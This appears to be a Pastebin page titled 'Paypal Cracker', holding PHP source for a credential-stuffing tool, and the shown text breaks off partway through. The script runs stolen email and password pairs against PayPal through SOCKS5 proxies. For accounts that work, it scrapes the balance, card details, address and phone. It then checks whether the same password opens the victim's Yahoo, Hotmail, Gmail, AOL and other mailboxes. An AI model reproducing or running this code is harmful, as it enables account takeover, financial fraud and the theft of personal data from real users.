Advertisement
rhiby

Paypal Cracker

Mar 24th, 2012
1,361
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.71 KB | None | 0 0
  1. <?php
  2.  
  3. include error_reporting(0);
  4.  
  5. @set_time_limit(0);
  6.  
  7. session_save_path('cookie');
  8.  
  9. ini_set('session.gc_probability', 1);
  10.  
  11. $cookiejar = 'cookie/st'.rand(10000000000,99999999999).'123.txt';
  12.  
  13. @fclose(fopen($cookiejar,'w'));
  14.  
  15. global $cookiejar;
  16.  
  17.  
  18.  
  19. $cookie_checkmail = 'cookie/mail'.rand(10000000000,99999999999).'123.txt';
  20.  
  21. fclose(fopen($cookie_checkmail,'w'));
  22.  
  23. global $cookie_checkmail;
  24.  
  25.  
  26.  
  27. class analytics_api {
  28.  
  29. public $auth;
  30.  
  31. public $accounts;
  32.  
  33. public function login($email, $password, $_sock) {
  34.  
  35. $curl = $this->curl_init("https://www.google.com/accounts/ClientLogin");
  36.  
  37. curl_setopt($curl, CURLOPT_POST, true);
  38.  
  39.  
  40.  
  41. $data = array(
  42.  
  43. 'accountType' => 'GOOGLE',
  44.  
  45. 'Email' => $email,
  46.  
  47. 'Passwd' => $password,
  48.  
  49. 'service' => 'analytics',
  50.  
  51. 'source' => ''
  52.  
  53. );
  54.  
  55. if($_sock){
  56.  
  57. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  58.  
  59. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  60.  
  61. }
  62.  
  63. curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
  64.  
  65. $output = curl_exec($curl);
  66.  
  67.  
  68.  
  69. $info = curl_getinfo($curl);
  70.  
  71. curl_close($curl);
  72.  
  73.  
  74.  
  75. $this->auth = '';
  76.  
  77. if($info['http_code'] == 200) {
  78.  
  79. preg_match('/Auth=(.*)/', $output, $matches);
  80.  
  81. if(isset($matches[1])) {
  82.  
  83. $this->auth = $matches[1];
  84.  
  85. }
  86.  
  87. }
  88.  
  89.  
  90.  
  91. return $this->auth != '';
  92.  
  93.  
  94.  
  95. }
  96.  
  97. protected function curl_init($url) {
  98.  
  99. $curl = curl_init();
  100.  
  101. curl_setopt($curl, CURLOPT_URL, $url);
  102.  
  103. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  104.  
  105.  
  106.  
  107. if($this->auth) {
  108.  
  109. curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: GoogleLogin auth=$this->auth"));
  110.  
  111. }
  112.  
  113. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
  114.  
  115. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  116.  
  117. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  118.  
  119.  
  120.  
  121. return $curl;
  122.  
  123.  
  124.  
  125. }
  126.  
  127.  
  128.  
  129. }
  130.  
  131.  
  132.  
  133. function _curl($url,$post="",$usecookie = false) {
  134.  
  135. $ch = curl_init();
  136.  
  137. if($post) {
  138.  
  139. curl_setopt($ch, CURLOPT_POST ,1);
  140.  
  141. curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  142.  
  143. }
  144.  
  145. curl_setopt($ch, CURLOPT_URL, $url);
  146.  
  147. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  148.  
  149. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6");
  150.  
  151. if ($usecookie) {
  152.  
  153. curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
  154.  
  155. curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
  156.  
  157. }
  158.  
  159. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  160.  
  161. $result=curl_exec ($ch);
  162.  
  163. curl_close ($ch);
  164.  
  165. return $result;
  166.  
  167. }
  168.  
  169.  
  170.  
  171. function curl_get($url, $postfields=false, $_sock=false, $ref, $timeout=false, $headers = false) {
  172.  
  173. static $curl;
  174.  
  175. if(empty($curl)) {
  176.  
  177. $curl = curl_init();
  178.  
  179. curl_setopt($curl, CURLOPT_COOKIEJAR, $cookiejar);
  180.  
  181. curl_setopt($curl, CURLOPT_COOKIEFILE, $cookiejar);
  182.  
  183. curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  184.  
  185. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  186.  
  187. curl_setopt($curl, CURLOPT_MAXREDIRS, 5);
  188.  
  189. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  190.  
  191. }
  192.  
  193. if($headers){
  194.  
  195. curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
  196.  
  197. }
  198.  
  199. if($timeout){
  200.  
  201. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,$timeout);
  202.  
  203. }
  204.  
  205. if($_sock){
  206.  
  207. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  208.  
  209. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  210.  
  211. }
  212.  
  213. curl_setopt($curl, CURLOPT_URL, $url);
  214.  
  215. if(stripos($url, 'https')!==false) {
  216.  
  217. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, 0);
  218.  
  219. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  220.  
  221. }
  222.  
  223. if ($postfields) {
  224.  
  225. curl_setopt($curl, CURLOPT_POST, 1);
  226.  
  227. curl_setopt($curl, CURLOPT_POSTFIELDS, $postfields);
  228.  
  229. }
  230.  
  231. if ($ref){
  232.  
  233. curl_setopt($curl, CURLOPT_REFERER,$ref);
  234.  
  235. }
  236.  
  237. $response = curl_exec($curl);
  238.  
  239. return $response;
  240.  
  241. @unlink($cookiejar);
  242.  
  243. }
  244.  
  245.  
  246.  
  247.  
  248.  
  249. function CheckSock($sock,$cookie, $timeout){
  250.  
  251. $site = "http://www.dreamhost.com/donate.cgi?id=11557";
  252.  
  253. $s = curl_get($site,false,$sock,"http://google.com");
  254.  
  255. }
  256.  
  257.  
  258.  
  259. function isLogin($email, $password, $sock,$split) {
  260.  
  261. $site = "https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run";
  262.  
  263. $s = curl_get($site, false, $sock, "http://www.paypal.com");
  264.  
  265. $post = getHiddenFormInputs($s, 'login_form');
  266.  
  267. if (!$post){
  268.  
  269. return "SOCKTIME";
  270.  
  271. }
  272.  
  273. $post['login_email'] = $email;
  274.  
  275. $post['login_password'] = $password;
  276.  
  277. $post = serializePostFields($post);
  278.  
  279. $site = "https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit";
  280.  
  281. $s = curl_get('https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit', $post, $sock, 'http://www.paypal.com');
  282.  
  283.  
  284.  
  285. if($s){
  286.  
  287. if(stristr($s,'Security Measures')){
  288.  
  289. return "SECURITY";
  290.  
  291. }
  292.  
  293. elseif(stristr($s,'more than 5 seconds')){
  294.  
  295. $_abc = getStr($s,'more than 5 seconds, <a href="', '">click here');
  296.  
  297. $s = curl_get($_abc, false, $sock, 'https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit');
  298.  
  299. }
  300.  
  301. elseif(stristr($s,'Please create a new password for your account')){
  302.  
  303. return "PASSWORD";
  304.  
  305. }
  306.  
  307. else{
  308.  
  309. $_abc = "https://www.paypal.com/bh/cgi-bin/webscr?cmd=_account&nav=0.0";
  310.  
  311. $s = curl_get($_abc, false, $sock, 'https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit');
  312.  
  313. }
  314.  
  315. }
  316.  
  317. else{
  318.  
  319. return "SOCKTIME";
  320.  
  321. }
  322.  
  323.  
  324.  
  325. if($s){
  326.  
  327. $FAIL = getStr($s, 's.prop15="','"');
  328.  
  329. $NOW = getStr($s,'s.prop1="','"');
  330.  
  331. $TYPE = getStr($s,'s.prop7="','"');
  332.  
  333. $STATUS = getStr($s,'s.prop8="','"');
  334.  
  335. $LIMIT = getStr($s,'s.prop9="','"');
  336.  
  337. $BALANCE = getStr($s,'<span class="balance">', '</span>');
  338.  
  339. $BALANCE = str_replace('<strong>',"",$BALANCE);
  340.  
  341. $BALANCE = str_replace('</strong>',"",$BALANCE);
  342.  
  343. $LASTLOGIN = getStr($s,'<div class="small secondary">', '</div>');
  344.  
  345.  
  346.  
  347. if($LIMIT == "Unrestricted"){
  348.  
  349. $LIMIT = "Unlimit";
  350.  
  351. }
  352.  
  353. else{
  354.  
  355. $LIMIT = "LIMITED";
  356.  
  357. }
  358.  
  359.  
  360.  
  361. if(!stristr($TYPE, "Unknown") or !stristr($STATUS, "Unknown")){
  362.  
  363. if($LIMIT == "Unlimit"){
  364.  
  365. $result = "$email | $password | <b>$TYPE</b> | <b>$STATUS</b> | <b>$BALANCE</b> | $LASTLOGIN | ";
  366.  
  367. if($_POST['checkmail'] == true){
  368.  
  369. $mailchecked = getmail($split, $email, $password, $sock);
  370.  
  371. $result .= "$mailchecked | ";
  372.  
  373. }
  374.  
  375. $result .= "$sock <br>";
  376.  
  377. if($_POST['getinfo']==true){
  378.  
  379. $info = GETINFO($sock);
  380.  
  381. if($info == false){
  382.  
  383. $info = "<font color=red>NOT ADD CARD</font>";
  384.  
  385. }
  386.  
  387. $result .= " ---- <b>MORE INFO : </b>$info<br>";
  388.  
  389. }
  390.  
  391.  
  392.  
  393. return $result;
  394.  
  395. }
  396.  
  397. else{
  398.  
  399. return "LIMITED";
  400.  
  401. }
  402.  
  403. }
  404.  
  405. elseif(stristr($NOW, "wax_error")){
  406.  
  407. return "LIMITED";
  408.  
  409. }
  410.  
  411. elseif(stristr($NOW, "SecurityChallenge")){
  412.  
  413. return "SOCKBL";
  414.  
  415. }
  416.  
  417. elseif(stristr($NOW,"home") or stristr($NOW,"login")){
  418.  
  419. return "DIE";
  420.  
  421. }
  422.  
  423. elseif(stristr($FAIL, "login_email")){
  424.  
  425. return "ERROR";
  426.  
  427. }
  428.  
  429. else{
  430.  
  431. return "ERROR";
  432.  
  433. }
  434.  
  435. }
  436.  
  437. else{
  438.  
  439. return "SOCKTIME";
  440.  
  441. }
  442.  
  443. }
  444.  
  445.  
  446.  
  447.  
  448.  
  449. function GETINFO($sock) {
  450.  
  451. $site = "https://www.paypal.com/us/cgi-bin/webscr?cmd=_profile-credit-card-new-clickthru&flag_from_account_summary=1&nav=0.5.2";
  452.  
  453. $response = curl_get($site, false, $sock, "http://www.paypal.com");
  454.  
  455. $checkcard = strpos($response, "Last 4 digits on card");
  456.  
  457. if(!$checkcard)
  458.  
  459. {
  460.  
  461. return false;
  462.  
  463. }else{
  464.  
  465. $temp = getStr1($response,'.gif" border="0" alt="','">');
  466.  
  467. $_type = $temp[0];
  468.  
  469. $temp = getStr1($temp[1],'<td>','</td>');
  470.  
  471. $_4digit = $temp[0];
  472.  
  473. $temp = getStr1($temp[1],'<td>','</td>');
  474.  
  475. $_exp = $temp[0];
  476.  
  477. $infocard = "$_type $_4digit $_exp | ";
  478.  
  479. }
  480.  
  481.  
  482.  
  483. $site = "https://www.paypal.com/ca/cgi-bin/webscr?cmd=_profile-address&nav=0.5.3";
  484.  
  485. $response = curl_get($site, false, $sock, "http://www.paypal.com");
  486.  
  487. $info = getStr($response,'<span class="emphasis">','</span>');
  488.  
  489. $info = str_replace("<br>"," | ",$info);
  490.  
  491.  
  492.  
  493. $info = $infocard.$info;
  494.  
  495.  
  496.  
  497. $sitemail = "https://www.paypal.com/ca/cgi-bin/webscr?cmd=_profile-email";
  498.  
  499. $s = curl_get($sitemail,false,$sock,"http://www.paypal.com");
  500.  
  501. $mail = getStr($s,'emailList-','"');
  502.  
  503.  
  504.  
  505. $sitephone = "https://www.paypal.com/ca/cgi-bin/webscr?cmd=_profile-phone";
  506.  
  507. $s = curl_get($sitephone,false,$sock,"http://www.paypal.com");
  508.  
  509. $phone = getStr(getStr($s,'checked name="phone" value="','</td>'),'">','</label>');
  510.  
  511.  
  512.  
  513. $info = $info.$phone.' | '.$mail;
  514.  
  515. return $info;
  516.  
  517. }
  518.  
  519.  
  520.  
  521. function getStr1($string,$start,$end){
  522.  
  523. $str = explode($start,$string,2);
  524.  
  525. $str = explode($end,$str[1],2);
  526.  
  527. return $str;
  528.  
  529. }
  530.  
  531.  
  532.  
  533.  
  534.  
  535. function getStr($string,$start,$end){
  536.  
  537. $str = explode($start,$string);
  538.  
  539. $str = explode($end,$str[1]);
  540.  
  541. return $str[0];
  542.  
  543. }
  544.  
  545.  
  546.  
  547.  
  548.  
  549. function getHiddenFormInputs($html) {
  550.  
  551. if(!preg_match('|<form[^>]+login_form[^>]+>.*</form>|Usi', $html, $form)) {
  552.  
  553. return '';
  554.  
  555. }
  556.  
  557. if(!preg_match_all('/<input[^>]+hidden[^>]*>/i', $form[0], $inputs)) {
  558.  
  559. return '';
  560.  
  561. }
  562.  
  563. $hiddenInputs = array();
  564.  
  565. foreach($inputs[0] as $input){
  566.  
  567. if (preg_match('|name\s*=\s*[\'"]([^\'"]+)[\'"]|i', $input, $name)) {
  568.  
  569. $hiddenInputs[$name[1]] = '';
  570.  
  571. if (preg_match('|value\s*=\s*[\'"]([^\'"]*)[\'"]|i', $input, $value)) {
  572.  
  573. $hiddenInputs[$name[1]] = $value[1];
  574.  
  575. }
  576.  
  577. }
  578.  
  579. }
  580.  
  581. return $hiddenInputs;
  582.  
  583. }
  584.  
  585.  
  586.  
  587. function serializePostFields($postFields) {
  588.  
  589. foreach($postFields as $key => $value) {
  590.  
  591. $value = urlencode($value);
  592.  
  593. $postFields[$key] = "$key=$value";
  594.  
  595. }
  596.  
  597. $postFields = implode($postFields, '&');
  598.  
  599. return $postFields;
  600.  
  601. }
  602.  
  603.  
  604.  
  605. function rmdirr($dirname){
  606.  
  607. if (!file_exists($dirname)){
  608.  
  609. echo "Not found folder";
  610.  
  611. return false;
  612.  
  613. }
  614.  
  615. if (is_file($dirname)) {
  616.  
  617. return unlink($dirname);
  618.  
  619. }
  620.  
  621. $dir = dir($dirname);
  622.  
  623. while (false !== $entry = $dir->read()) {
  624.  
  625. if ($entry == '.' || $entry == '..') {
  626.  
  627. continue;
  628.  
  629. }
  630.  
  631. rmdirr("$dirname/$entry");
  632.  
  633. }
  634.  
  635. $dir->close();
  636.  
  637. return rmdir($dirname);
  638.  
  639. }
  640.  
  641.  
  642.  
  643. function yahoo($mail,$pass, $_sock){
  644.  
  645. $random_text = array("fr",
  646.  
  647. "co.uk",
  648.  
  649. "vn",
  650.  
  651. "ag", "br",
  652.  
  653. "ag", "ca",
  654.  
  655. "al",
  656.  
  657. "co",
  658.  
  659. "cl",
  660.  
  661. "mx",
  662.  
  663. "pe",
  664.  
  665. "ve",
  666.  
  667. "qc",
  668.  
  669. "dk",
  670.  
  671. "de",
  672.  
  673. "ie",
  674.  
  675. "it",
  676.  
  677. "ar");
  678.  
  679. srand(time());
  680.  
  681. $sizeof = count($random_text);
  682.  
  683. $random = (rand()%$sizeof);
  684.  
  685. $url="http://login.yahoo.com/config/login?.intl=".$random_text[$random]."&.src=ym&login=".$mail."&passwd=".$pass;
  686.  
  687. $curl=curl_init();
  688.  
  689. curl_setopt($curl, CURLOPT_TIMEOUT, 4);
  690.  
  691. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  692.  
  693. curl_setopt($curl, CURLOPT_HEADER, true);
  694.  
  695. curl_setopt($curl, CURLOPT_URL, $url);
  696.  
  697. if($_sock){
  698.  
  699. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  700.  
  701. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  702.  
  703. }
  704.  
  705. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  706.  
  707. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
  708.  
  709. $xxx=curl_exec($curl);
  710.  
  711. curl_close($curl);
  712.  
  713. if(stristr($xxx,"yahoo.com")){
  714.  
  715. return 0;
  716.  
  717. }else{
  718.  
  719. return 1;
  720.  
  721. }
  722.  
  723. }
  724.  
  725.  
  726.  
  727. function netzero($mail,$pass, $_sock){
  728.  
  729. $url = "https://my.netzero.net/start/login.do";
  730.  
  731. $user_agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
  732.  
  733. $postvars =
  734.  
  735. "operation=login&gotoURL=http%3A%2F%2Fmy.netzero.net%2Fstart%2Fwebmail.do%3Fcf%3Dwww&memberId=".$mail."&netzero.net=netzero.com&password=".$pass."&x=56&y=10";
  736.  
  737. $cookie = "cookies/netzero";
  738.  
  739. @unlink($cookie);
  740.  
  741. $curl = curl_init($url);
  742.  
  743. curl_setopt($curl, CURLOPT_TIMEOUT, 4);
  744.  
  745. curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
  746.  
  747. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  748.  
  749. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
  750.  
  751. curl_setopt($curl, CURLOPT_HEADER, 1);
  752.  
  753. curl_setopt($curl, CURLOPT_POST, 1);
  754.  
  755. if($_sock){
  756.  
  757. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  758.  
  759. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  760.  
  761. }
  762.  
  763. curl_setopt($curl, CURLOPT_POSTFIELDS, $postvars);
  764.  
  765. curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_checkmail);
  766.  
  767. // curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  768.  
  769. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  770.  
  771. $content = curl_exec ($curl);
  772.  
  773. curl_close ($curl);
  774.  
  775. unset($curl);
  776.  
  777. if(stristr($content,"The Member ID or Password you have entered is incorrect")){
  778.  
  779. return 0;
  780.  
  781. }
  782.  
  783. else{
  784.  
  785. return 1;
  786.  
  787. }
  788.  
  789. }
  790.  
  791.  
  792.  
  793. function hotmail($username, $password){
  794.  
  795. $cookie = 'mail'.rand(1000000,9999999).'123.txt';
  796.  
  797. @fclose(fopen($cookie,'w'));
  798.  
  799.  
  800.  
  801. $url = "http://www.hotmail.com";
  802.  
  803. $s = _curl($url,"",$cookie);
  804.  
  805. $link = getStr($s,'var g_QS="','"');
  806.  
  807. $link = "https://login.live.com/ppsecure/post.srf?".$link;
  808.  
  809.  
  810.  
  811. $PPFTid = getStr($s,'PPFT" id="','"');
  812.  
  813. $PPFTvalue = getStr($s,$PPFTid.'" value="','"');
  814.  
  815. $post = "login=".$username."&passwd=".$password."&type=11&LoginOptions=2&MEST=&PPSX=Passp&PPFT=".$PPFTvalue."&idsbho=1&PwdPad=&sso=&i1=1&i2=2&i3=6382&i4=";
  816.  
  817.  
  818.  
  819. $s = _curl($link,$post,$cookie);
  820.  
  821. unlink($cookie);
  822.  
  823. if(stristr($s,'window.location.replace("http://mail.live.com/default')){
  824.  
  825. return TRUE;
  826.  
  827. }
  828.  
  829. else{
  830.  
  831. return FALSE;
  832.  
  833. }
  834.  
  835. }
  836.  
  837.  
  838.  
  839. function gmail($mail,$pass, $_sock){
  840.  
  841. $api = new analytics_api();
  842.  
  843. if($api->login($mail, $pass, $_sock)) {
  844.  
  845. return 1;
  846.  
  847. }else{
  848.  
  849. return 0;
  850.  
  851. }
  852.  
  853. }
  854.  
  855.  
  856.  
  857. function att($mail,$pass, $_sock){
  858.  
  859. $url = "https://webauth.att.net/auth/webmail/login";
  860.  
  861. $xax=explode("@",$mail);
  862.  
  863. $domain1=trim($xax[0]);
  864.  
  865. $domain2=trim($xax[1]);
  866.  
  867. $user_agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
  868.  
  869. $postvars =
  870.  
  871. "passurl=http%3A%2F%2Fwebmail.att.net%2Fwmc%2Fen-US%2Fv%2Fwmgoto%2F4B308384000C20E4000040702223064702&locale=en-US&user=".$mail."&user1=".$domain1."&domain=".$domain2."&passwd=".$pass."&login.x=19&login.y=9&login=Login";
  872.  
  873. $cookie = "cookies/att";
  874.  
  875. @unlink($cookie);
  876.  
  877. $curl = curl_init($url);
  878.  
  879. curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
  880.  
  881. curl_setopt($curl, CURLOPT_TIMEOUT, 4);
  882.  
  883. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  884.  
  885. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
  886.  
  887. curl_setopt($curl, CURLOPT_HEADER, 1);
  888.  
  889. curl_setopt($curl, CURLOPT_POST, 1);
  890.  
  891. if($_sock){
  892.  
  893. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  894.  
  895. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  896.  
  897. }
  898.  
  899. curl_setopt($curl, CURLOPT_POSTFIELDS, $postvars);
  900.  
  901. curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_checkmail);
  902.  
  903. // curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  904.  
  905. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  906.  
  907. $content = curl_exec ($curl);
  908.  
  909. curl_close ($curl);
  910.  
  911. unset($curl);
  912.  
  913. if(stristr($content,"Please check and re-enter your e-mail username, domain, and password")){
  914.  
  915. return 0;
  916.  
  917. }else{
  918.  
  919. return 1;
  920.  
  921. }
  922.  
  923. }
  924.  
  925.  
  926.  
  927. function aol($mail,$pass, $_sock){
  928.  
  929. $url = "https://my.screenname.aol.com/_cqr/login/login.psp";
  930.  
  931. $user_agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
  932.  
  933. $postvars =
  934.  
  935. "screenname=".$mail."&password=".$pass."&submitSwitch=1&siteId=aolcomprod&mcState=initialized&authLev=1";
  936.  
  937. $cookie = "cookies/aol";
  938.  
  939. @unlink($cookie);
  940.  
  941. $curl = curl_init($url);
  942.  
  943. curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
  944.  
  945. curl_setopt($curl, CURLOPT_TIMEOUT, 4);
  946.  
  947. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  948.  
  949. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
  950.  
  951. curl_setopt($curl, CURLOPT_HEADER, 1);
  952.  
  953. curl_setopt($curl, CURLOPT_POST, 1);
  954.  
  955. if($_sock){
  956.  
  957. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  958.  
  959. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  960.  
  961. }
  962.  
  963. curl_setopt($curl, CURLOPT_POSTFIELDS, $postvars);
  964.  
  965. curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_checkmail);
  966.  
  967. // curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  968.  
  969. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  970.  
  971. $content = curl_exec ($curl);
  972.  
  973. curl_close ($curl);
  974.  
  975. unset($curl);
  976.  
  977. if(stristr($content,"Invalid Username or Password.")){
  978.  
  979. return 0;
  980.  
  981. }else{
  982.  
  983. return 1;
  984.  
  985. }
  986.  
  987. }
  988.  
  989.  
  990.  
  991. function juno($mail,$pass, $_sock){
  992.  
  993. $url = "https://webmail.juno.com/cgi-bin/login.cgi?rememberMe=0";
  994.  
  995. $user_agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
  996.  
  997. $postvars =
  998.  
  999. "LOGIN=".$mail."&PASSWORD=".$pass."&ajaxSupported=2%2F61220&domain=juno.com";
  1000.  
  1001. $cookie = "cookies/juno";
  1002.  
  1003. @unlink($cookie);
  1004.  
  1005. $curl = curl_init($url);
  1006.  
  1007. curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
  1008.  
  1009. curl_setopt($curl, CURLOPT_TIMEOUT, 4);
  1010.  
  1011. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  1012.  
  1013. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
  1014.  
  1015. curl_setopt($curl, CURLOPT_HEADER, 1);
  1016.  
  1017. curl_setopt($curl, CURLOPT_POST, 1);
  1018.  
  1019. if($_sock){
  1020.  
  1021. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  1022.  
  1023. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  1024.  
  1025. }
  1026.  
  1027. curl_setopt($curl, CURLOPT_POSTFIELDS, $postvars);
  1028.  
  1029. curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_checkmail);
  1030.  
  1031. // curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  1032.  
  1033. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1034.  
  1035. $content = curl_exec ($curl);
  1036.  
  1037. curl_close ($curl);
  1038.  
  1039. unset($curl);
  1040.  
  1041. if(stristr($content,"match our files. Please re-enter your Juno username and password")){
  1042.  
  1043. return 0;
  1044.  
  1045. }else{
  1046.  
  1047. return 1;
  1048.  
  1049. }
  1050.  
  1051. }
  1052.  
  1053.  
  1054.  
  1055. function mmail($mail,$pass, $_sock){
  1056.  
  1057. $url = "https://www.mail.com/auth/login.aspx";
  1058.  
  1059. $user_agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
  1060.  
  1061. $postvars ="login=".$mail."&password=".$pass;
  1062.  
  1063. $cookie = "cookies/mmail";
  1064.  
  1065. @unlink($cookie);
  1066.  
  1067. $curl = curl_init($url);
  1068.  
  1069. curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
  1070.  
  1071. curl_setopt($curl, CURLOPT_TIMEOUT, 4);
  1072.  
  1073. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  1074.  
  1075. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
  1076.  
  1077. curl_setopt($curl, CURLOPT_HEADER, 1);
  1078.  
  1079. curl_setopt($curl, CURLOPT_POST, 1);
  1080.  
  1081. if($_sock){
  1082.  
  1083. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  1084.  
  1085. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  1086.  
  1087. }
  1088.  
  1089. curl_setopt($curl, CURLOPT_POSTFIELDS, $postvars);
  1090.  
  1091. curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_checkmail);
  1092.  
  1093. // curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  1094.  
  1095. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1096.  
  1097. $content = curl_exec ($curl);
  1098.  
  1099. curl_close ($curl);
  1100.  
  1101. unset($curl);
  1102.  
  1103. if(stristr($content,"Invalid username")){
  1104.  
  1105. return 0;
  1106.  
  1107. }else{
  1108.  
  1109. return 1;
  1110.  
  1111. }
  1112.  
  1113. }
  1114.  
  1115.  
  1116.  
  1117. function mac($mail,$pass, $_sock){
  1118.  
  1119. $url = "https://auth.me.com/authenticate";
  1120.  
  1121. $user_agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
  1122.  
  1123. $postvars =
  1124.  
  1125. "returnURL=aHR0cDovL3d3dy5tZS5jb20vbWFpbC8%3D&service=mail&ssoNamespace=primary-me&anchor=account&cancelURL=http%3A%2F%2Fwww.me.com%2Fmail&formID=loginForm&username=".$mail."&password=".$pass;
  1126.  
  1127. $cookie = "cookies/mac";
  1128.  
  1129. @unlink($cookie);
  1130.  
  1131. $curl = curl_init($url);
  1132.  
  1133. curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
  1134.  
  1135. curl_setopt($curl, CURLOPT_TIMEOUT, 4);
  1136.  
  1137. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
  1138.  
  1139. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 1);
  1140.  
  1141. curl_setopt($curl, CURLOPT_HEADER, 1);
  1142.  
  1143. curl_setopt($curl, CURLOPT_POST, 1);
  1144.  
  1145. if($_sock){
  1146.  
  1147. curl_setopt($curl, CURLOPT_PROXY, $_sock);
  1148.  
  1149. curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  1150.  
  1151. }
  1152.  
  1153. curl_setopt($curl, CURLOPT_POSTFIELDS, $postvars);
  1154.  
  1155. curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_checkmail);
  1156.  
  1157. // curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
  1158.  
  1159. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  1160.  
  1161. $content = curl_exec ($curl);
  1162.  
  1163. curl_close ($curl);
  1164.  
  1165. unset($curl);
  1166.  
  1167. if(stristr($content,"Incorrect member name or password.")){
  1168.  
  1169. return 0;
  1170.  
  1171. }else{
  1172.  
  1173. return 1;
  1174.  
  1175. }
  1176.  
  1177. }
  1178.  
  1179.  
  1180.  
  1181. function getmail($xSplit,$xMail,$xPass, $_sock){
  1182.  
  1183. $R_split=$xSplit;
  1184.  
  1185. $mail_text=$xMail;
  1186.  
  1187. $pass_text=$xPass;
  1188.  
  1189. $pieces['xMail'] = $mail_text;
  1190.  
  1191. $pieces['xPass'] = $pass_text;
  1192.  
  1193. if(stristr($pieces['xMail'],"yahoo.")||stristr($pieces['xMail'],"ymail.")||stristr($pieces['xMail'],"rocketmail.")){
  1194.  
  1195. $servername = "Yahoo";
